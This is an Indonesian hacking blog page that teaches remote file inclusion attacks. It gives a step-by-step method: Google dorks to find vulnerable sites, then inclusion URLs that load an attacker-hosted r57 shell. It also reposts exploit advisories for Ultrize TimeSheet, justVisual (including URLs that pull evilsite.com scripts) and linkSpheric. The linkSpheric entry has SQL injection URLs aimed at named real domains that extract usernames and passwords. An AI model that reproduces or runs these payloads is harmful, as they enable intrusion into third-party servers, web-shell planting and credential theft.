RFI

terima kasih teman2 ku yg mau berkunjung ke blog aq

saya akan menjelaskan RFI, RFI adalah salah satu cara dalam penetrasi sebuah server melalui port 80

tanpa panjang lebar langsung praktek yah


contoh:

- Dork <==== adalah sebuah cara dalam mendapatkan target (artinya keyword yg kita
ketik di mesin pencari seperti google)  
- Vulnerable file <==== adalah sebuah file dimana ada celah keamanan

contoh
Dork       "Powered by MiniCWB"

Vulnerable file :
       language/en.inc.php
        language/hu.inc.php
        language/no.inc.php
        language/ro.inc.php
        language/ru.inc.php


- dari data diatas kalian coba ketik digoogle ke dari dark tersebut
- maka akan banyak muncul web2 yang memiliki kelemahan dari file tersebut
- ambil web target yg diinginkan (copy linknya jgn diklik)
- edit link target yang diinginkan

http://localhost/[path]/language/en.inc.php?LANG=[evilc0de]
http://localhost/[path]/language/hu.inc.php?LANG=[evilc0de]
http://localhost/[path]/language/no.inc.php?LANG=[evilc0de]
http://localhost/[path]/language/ro.inc.php?LANG=[evilc0de]
http://localhost/[path]/language/ru.inc.php?LANG=[evilc0de]

[evilc0de] adalah sebuah script yg disisipkan di web yg kita punya

contoh script g saya punya : http://geocities.com/anggri_yanto/r57.txt

-jgn lp diakhiri tanda tanya untuk agar dieksekusi

Read More

Ultrize TimeSheet 1.2.2 Remote File Inclusion Vulnerability

       Software : Ultrize TimeSheet version 1.2.2
      Vendor   : http://www.ultrize.com/
      Download : http://www.ultrize.com/timesheet/download/timeSheet-20080505.zip
      Author   : NoGe
     

=====================================================================================


 [o] Vulnerable file


      include($config['include_dir'].'timesheet.class.php');

       include/timesheet.php



 [o] Exploit

      http://localhost/[path]/include/timesheet.php?config[include_dir]=[evilc0de]


=====================================================================================

Read More

justVisual 1.2 (fs_jVroot) Remote File Inclusion Vulnerabilities

#################################################################################################################
[+] justVisual 1.2 (fs_jVroot) Remote File Inclusion Vulnerabilities
[+] Discovered By SirGod
[+] http://insecurity-ro.org
[+] http://h4cky0u.org
##################################################################################################################

[+] Download : http://www.fh54.de/justVisual/justVisual_1.2.zip

[+] Remote File Inclusion

- Vulnerable code is everywhere

- PoC's

  http://127.0.0.1/path/justVisual/sites/site/pages/index.php?fs_jVroot=http://evilsite.com/evilscript.txt

  http://127.0.0.1/path/justVisual/sites/test/pages/contact.php?fs_jVroot=http://evilsite.com/evilscript.txt

  http://127.0.0.1/path/justVisual/system/pageTemplate.php?fs_jVroot=http://evilsite.com/evilscript.txt

  http://127.0.0.1/path/justVisual/system/utilities.php?fs_jVroot=http://evilsite.com/evilscript.txt

##################################################################################################################

# milw0rm.com [2009-07-30]

Read More

linkSpheric 0.74 Beta 6 SQL Inejction Vuln

linkSpheric 0.74 Beta 6 SQL Inejction Vuln

Thursday, July 31, 2009

[o] linkSpheric 0.74 Beta 6 SQL Inejction Vulnerability
Software : linkSpheric version 0.74 Beta 6
Vendor   : http://dataspheric.com/
Download : http://sourceforge.net/projects/linkspheric/
Referensi: NoGe

[o] Vulnerable file
viewListing.php

[o] Exploit
http://localhost/[path]/viewListing.php?listID=[SQL]

[o] Proof of concept
http://dataspheric.com/directory/viewListing.php?listID=-52+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,group_concat(userName,0x3a,password),21,22,23,24,25,26,27,28+from+users--
http://pcmsite.net/links/viewListing.php?listID=-5+union+select+1,2,3,4,5,6,7,8,group_concat(userName,0x3a,password),10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28+from+users--

[o] Dork
"Powered by linkSpheric"

Read More